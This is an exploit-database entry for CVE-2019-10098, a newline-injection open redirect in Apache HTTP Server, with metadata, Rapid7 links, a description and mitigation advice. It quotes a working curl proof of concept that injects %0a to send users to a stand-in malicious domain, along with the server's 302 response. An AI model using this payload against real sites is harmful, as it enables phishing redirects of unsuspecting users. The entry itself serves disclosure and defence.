header-logo
Suggest Exploit
vendor:
Unknown
by:
Unknown
6.1
CVSS
MEDIUM
Newline Injection
20
CWE
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2019-10098
CPE: a:vendor:product_name
Metasploit: https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/ibm-http_server-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp8-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/debian-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2019-10082/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2019-10092/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2019-10098/https://www.rapid7.com/db/vulnerabilities/suse-cve-2019-10098/https://www.rapid7.com/db/?q=CVE-2019-10098&type=&page=2https://www.rapid7.com/db/?q=CVE-2019-10098&type=&page=2
Other Scripts:
Tags: cve,cve2019,redirect,apache,server
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei Metadata: {'max-request': 1, 'vendor': 'apache', 'product': 'http_server'}
Platforms Tested:
2019

Newline Injection in URL Redirection

The vulnerability allows an attacker to redirect URLs to a malicious website by injecting newlines in the URL. This can be achieved by using the %0a character, which represents a newline. By appending the malicious website after the newline character, the attacker can redirect users to the malicious site.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input when constructing URLs for redirection. Additionally, URL encoding should be used to prevent newline injection attacks.
Source

Exploit-DB raw data:

Normal URLs like http://redirect.local/test will be forwared to https://redirect.local/test. But by using newlines (CVE 2019-10098), we can redirect somewhere else (i.e. to `https://redirect.local.evilwebsite.com`):

```
curl -Ik 'https://redirect.local/%0a.evilwebsite.com' --path-as-is
HTTP/2 302 
date: Mon, 28 Oct 2019 03:36:58 GMT
content-type: text/html; charset=iso-8859-1
location: https://redirect.local.evilwebsite.com
```